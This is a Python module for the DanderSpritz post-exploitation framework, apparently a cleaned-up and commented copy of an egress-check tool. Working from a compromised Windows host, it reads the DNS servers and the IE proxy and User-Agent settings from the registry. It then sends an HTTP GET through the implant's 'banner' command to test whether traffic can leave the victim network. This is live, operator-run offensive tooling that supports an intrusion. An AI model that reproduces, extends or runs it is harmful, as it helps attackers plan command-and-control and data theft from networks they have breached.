
import dsz
import dsz.lp
import dsz.file
import os, sys, re
import base64, traceback
from optparse import OptionParser
import ops, ops.cmd, util.ip
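class canGetOut:
    """Egress check driven from a DSZ session on the target host.

    Resolves the chosen destination, reads the target's IE proxy and
    User-Agent settings out of the registry, then uses the DSZ ``banner``
    command to push a minimal HTTP GET (directly or via the configured
    proxy) and reports whether the first response line carries ``200 OK``.

    All output goes through ``dsz.ui.Echo``; the methods return nothing
    useful except ``nslookup`` and the private parsing helpers.
    """

    # Used when the registry User-Agent lookup fails.  This is the bare
    # product token only: the request templates in getOut() prepend the
    # "User-Agent: " header name themselves, so a default that already
    # carried the header name produced "User-Agent: User-Agent: Mozilla/..."
    # on the wire.
    DEFAULT_USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'

    # Anchored at both ends so an FQDN whose leading labels are numeric
    # (e.g. 1.2.3.4.example.com) is still resolved rather than used verbatim.
    # Octet range is deliberately not validated, as before.
    _IPV4_LITERAL = re.compile(r'\A(\d{1,3}\.){3}\d{1,3}\Z')

    # Registry key holding the IE settings read by getUserAgent()/proxy().
    _REG_INTERNET_SETTINGS = u'"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"'

    def __init__(self, options):
        """Capture the operator's choices.

        options: parsed OptionParser result.  ``ipdst`` (IP literal or
        FQDN; None means "show the menu") and ``port`` (a string) are read.
        """
        self.ip = options.ipdst
        self.port = options.port
        self.domain = None
        self.userAgent = self.DEFAULT_USER_AGENT
        self.proxy_ip = None
        self.proxy_port = None
        self.dns = []

    def main(self):
        """Run the whole check: resolve, read proxy/UA, then attempt egress."""
        self.getDNS()
        if self.ip:
            # Keep the name the operator gave for the Host header even when
            # it gets replaced by a resolved address below.
            self.domain = self.ip
            if not self._is_ipv4_literal(self.ip):
                dsz.ui.Echo('Resolving IP address...')
                self.ip = self.nslookup(self.ip)
        else:
            self.menu()
        # nslookup()/menu() may have left ip as None; nothing to probe then.
        if self.ip and self.port:
            dsz.ui.Echo('Looking for IE Proxy Settings in the Registry...')
            self.proxy()
            dsz.ui.Echo('Getting User-Agent string from the registry...')
            self.getUserAgent()
            dsz.ui.Echo('Attempting to get out...')
            self.getOut()

    def menu(self):
        """Interactively pick one of the built-in destinations and resolve it.

        On an out-of-range choice an error is echoed and ``ip``/``domain``
        are left untouched (so main() skips the probe).
        """
        addrlist = ['www.microsoft.com', 'www.google.com', 'www.yahoo.com']
        dsz.ui.Echo('Choose an address...')
        for number, addr in enumerate(addrlist, 1):
            dsz.ui.Echo('%d) %s' % (number, addr))
        choice = dsz.ui.GetInt('Enter number:', '1')
        if choice <= 0 or choice > len(addrlist):
            dsz.ui.Echo('Invalid choice', dsz.ERROR)
            return
        chosen = addrlist[choice - 1]
        dsz.ui.Echo('You chose: %s' % chosen)
        self.domain = chosen
        self.ip = self.nslookup(chosen)

    def getDNS(self):
        """Collect the target's configured DNS servers via ``ipconfig``.

        Best effort: if the result object cannot be walked, an error is
        echoed and ``self.dns`` is left unchanged.  Only ``Exception`` is
        caught (not a bare ``except``) so KeyboardInterrupt/SystemExit
        still propagate to the operator.
        """
        cmd = ops.cmd.getDszCommand('ipconfig', dszquiet=True)
        obj = cmd.execute()
        try:
            servers = [entry.ip for entry in obj.fixeddataitem.dnsservers.dnsserver]
        except Exception:
            dsz.ui.Echo('\tError getting dns servers', dsz.ERROR)
            return
        self.dns.extend(servers)

    def nslookup(self, name):
        """Resolve ``name`` on the target with ``nameserverlookup``.

        Returns the first IPv4 answer (stripped) or None when the command
        fails or yields no IPv4 record.  ``name`` is spliced unquoted into
        the DSZ command line; it originates from the operator's ``-d``
        argument or the fixed menu list, never from the target.
        """
        cmd = ops.cmd.getDszCommand('nameserverlookup %s' % name, dszquiet=True)
        obj = cmd.execute()
        if not cmd.success:
            dsz.ui.Echo('\tError: Unable to complete remote nslookup', dsz.ERROR)
            return None
        for hostinfo in obj.hostinfo:
            if util.ip.validate_ipv4(hostinfo.info):
                address = hostinfo.info.strip()
                dsz.ui.Echo('\t%s' % address)
                return address
        return None

    def getUserAgent(self):
        """Replace the default User-Agent with the target's own registry value.

        Reads the "User Agent" value under the Internet Settings key of
        hive ``C`` (presumably the current user's hive — confirm against the
        DSZ registryquery docs).  On any failure the default is kept; the
        previous code echoed the error and then dereferenced the failed
        result anyway.  Quote and CR/LF characters are stripped because the
        value is spliced into a double-quoted ``banner -send`` argument and
        onto a single HTTP header line.
        """
        cmd = ops.cmd.getDszCommand('registryquery -hive C', dszquiet=True)
        cmd.value = u'"User Agent"'
        cmd.key = self._REG_INTERNET_SETTINGS
        obj = cmd.execute()
        if not cmd.success:
            dsz.ui.Echo('\tUser Agent regquery failed', dsz.ERROR)
            return
        try:
            value = obj.key[0].value[0].value.strip()
        except (AttributeError, IndexError):
            dsz.ui.Echo('\tUser Agent value missing from regquery result', dsz.ERROR)
            return
        cleaned = self._sanitize_header_value(value)
        if not cleaned:
            dsz.ui.Echo('\tUser Agent value empty, keeping default', dsz.WARNING)
            return
        self.userAgent = cleaned
        dsz.ui.Echo('\tUser agent set to: %s' % self.userAgent)

    def proxy(self):
        """Read the IE proxy configuration (ProxyEnable / ProxyServer).

        ``proxy_ip``/``proxy_port`` are set only when the proxy is enabled
        and a host:port could be parsed from ProxyServer; otherwise both
        stay None and getOut() tries a direct connection.
        """
        cmd = ops.cmd.getDszCommand('registryquery -hive C', dszquiet=True)
        cmd.value = u'"ProxyEnable"'
        cmd.key = self._REG_INTERNET_SETTINGS
        obj = cmd.execute()
        if not cmd.success:
            dsz.ui.Echo('\tProxy registryquery failed', dsz.ERROR)
            return
        try:
            enabled = obj.key[0].value[0].value.strip()
        except (AttributeError, IndexError):
            dsz.ui.Echo('\tProxyEnable value missing from regquery result', dsz.ERROR)
            return
        if enabled != '1':
            dsz.ui.Echo('\tIE Proxy currently DISABLED')
            return
        dsz.ui.Echo('\tProxy is currently ENABLED. Querying registry for server')
        cmd.value = u'"ProxyServer"'
        obj = cmd.execute()
        if not cmd.success:
            dsz.ui.Echo('\tFailed to get ProxyServer', dsz.ERROR)
            return
        try:
            server = obj.key[0].value[0].value.strip()
        except (AttributeError, IndexError):
            dsz.ui.Echo('\tProxyServer value missing from regquery result', dsz.ERROR)
            return
        dsz.ui.Echo('\tProxy server is: %s' % str(server))
        host, port = self._parse_proxy_server(server)
        if not host or not port:
            # The old two-way unpack raised on anything but a lone host:port.
            dsz.ui.Echo('\tCould not parse host:port from ProxyServer, ignoring proxy', dsz.WARNING)
            return
        self.proxy_ip, self.proxy_port = host, port

    @classmethod
    def _is_ipv4_literal(cls, text):
        """True when ``text`` is a whole dotted quad (octet range unchecked)."""
        return cls._IPV4_LITERAL.match(text or '') is not None

    @staticmethod
    def _sanitize_header_value(value):
        """Drop characters that would break the request line or its DSZ quoting.

        CR, LF and ``"`` are removed and surrounding whitespace is trimmed;
        everything else is passed through unchanged.
        """
        return re.sub(r'["\r\n]', '', value or '').strip()

    @staticmethod
    def _parse_proxy_server(value):
        """Split an IE ``ProxyServer`` registry value into ``(host, port)``.

        IE stores either a single ``host:port`` or a per-protocol list such
        as ``http=h1:8080;https=h2:8080;ftp=h3:21``.  For the list form the
        ``http=`` entry is preferred (that is what getOut() speaks), falling
        back to the first entry.  Either element may be None when it cannot
        be determined; the port is returned as the string found.
        """
        value = (value or '').strip()
        if not value:
            return (None, None)
        candidate = value
        if ';' in value or '=' in value:
            entries = [e.strip() for e in value.split(';') if e.strip()]
            if not entries:
                return (None, None)
            chosen = None
            for entry in entries:
                scheme, sep, hostport = entry.partition('=')
                if sep and scheme.strip().lower() == 'http':
                    chosen = hostport.strip()
                    break
            if chosen is None:
                first = entries[0]
                chosen = first.partition('=')[2].strip() if '=' in first else first
            candidate = chosen
        host, sep, port = candidate.rpartition(':')
        if not sep:
            return (candidate or None, None)
        return (host or None, port or None)

    def _banner(self, ip, port, payload):
        """Build the DSZ ``banner`` command that connects to ip:port and sends ``payload``.

        ``wait`` is fixed at 5 seconds, as in the original.
        """
        cmd = ops.cmd.getDszCommand('banner')
        cmd.optdict['ip'] = ip
        cmd.optdict['port'] = port
        cmd.optdict['wait'] = '5'
        cmd.optdict['send'] = payload
        return cmd

    def getOut(self):
        """Send one HTTP GET and report whether a ``200 OK`` status came back.

        With a proxy configured the operator is asked whether to use it: if
        so an absolute-URI request goes to the proxy; if not, a bare
        ``GET /`` with no Host or User-Agent header goes straight to the
        target (preserved from the original — NOTE(review): a virtual-hosted
        target may answer 400 to that, which reads as a false negative).
        Without a proxy the direct request carries Host and User-Agent.
        """
        if self.proxy_ip and self.proxy_port:
            dsz.ui.Echo('Proxy: %s:%s' % (self.proxy_ip, self.proxy_port))
            choice = dsz.ui.Prompt('It appears a proxy is set. Banner with proxy settings?')
            if choice == 1:
                payload = '"GET http://%s/ HTTP/1.0\\r\\nHost: %s\\r\\nUser-Agent: %s\\r\\nProxy-Connection: Keep-Alive\\r\\n\\r\\n"' % (self.domain, self.domain, self.userAgent)
                cmd = self._banner(self.proxy_ip, self.proxy_port, payload)
            else:
                cmd = self._banner(self.ip, self.port, '"GET / HTTP/1.0\\r\\n\\r\\n"')
        else:
            payload = '"GET / HTTP/1.0\\r\\nHost: %s\\r\\nUser-Agent: %s\\r\\n\\r\\n"' % (self.domain, self.userAgent)
            cmd = self._banner(self.ip, self.port, payload)
        obj = cmd.execute()
        if not cmd.success:
            # Report the endpoint actually dialled (proxy or target), not
            # always the target as the original did.
            dsz.ui.Echo('\tCan not get out to %s:%s' % (cmd.optdict['ip'], cmd.optdict['port']), dsz.ERROR)
            return
        if len(obj.transfer) == 0:
            dsz.ui.Echo("\tWe seem to have gotten a 'Timeout waiting for data', check CMDID %s" % obj.cmdid, dsz.WARNING)
            return
        lines = obj.transfer[0].text.splitlines()
        if not lines:
            dsz.ui.Echo('\tEmpty response received, check CMDID %s' % obj.cmdid, dsz.WARNING)
            return
        response = lines[0]
        dsz.ui.Echo('\t%s' % response)
        # Only the status line is inspected.  A 200 proves a TCP path and an
        # HTTP speaker on the far end; a proxy, captive portal or filtering
        # appliance can answer 200 with its own page, so treat this as
        # evidence of egress rather than proof the intended host was reached.
        if '200 OK' in response:
            dsz.ui.Echo('We can get out successfully!', dsz.GOOD)
        else:
            dsz.ui.Echo('Non 200 OK Response Received', dsz.WARNING)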
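def parseArgs():
    """Parse ``-d``/``-p`` from the command line and run the check.

    ``-d`` is an IP literal or FQDN (omit it to get the interactive menu);
    ``-p`` is the TCP port as a string, default ``'80'``.

    Note: ``sys.argv`` is passed whole to ``parse_args``, so ``args`` always
    holds at least the script name, and ``-p`` always has a value, so the
    guard below runs the check on every invocation; the ``Exiting...``
    branch is unreachable in practice.  It is kept unchanged so the command
    line keeps behaving exactly as before.
    """
    usage = 'cangetout -d <IP ADDRESS|FQDN> -p <PORT>'
    parser = OptionParser(usage=usage)
    parser.add_option('-d', dest='ipdst', type='string', action='store', default=None)
    parser.add_option('-p', dest='port', type='string', action='store', default='80')
    options, args = parser.parse_args(sys.argv)
    # Single-argument print() form is valid on both Python 2 and 3; the old
    # print statement was a syntax error under Python 3.
    print(usage)
    if len(sys.argv) == 1 or ((options.ipdst or options.port) and len(args) > 0):
        canGetOut(options).main()
    else:
        dsz.ui.Echo('Exiting...')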
# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    parseArgs()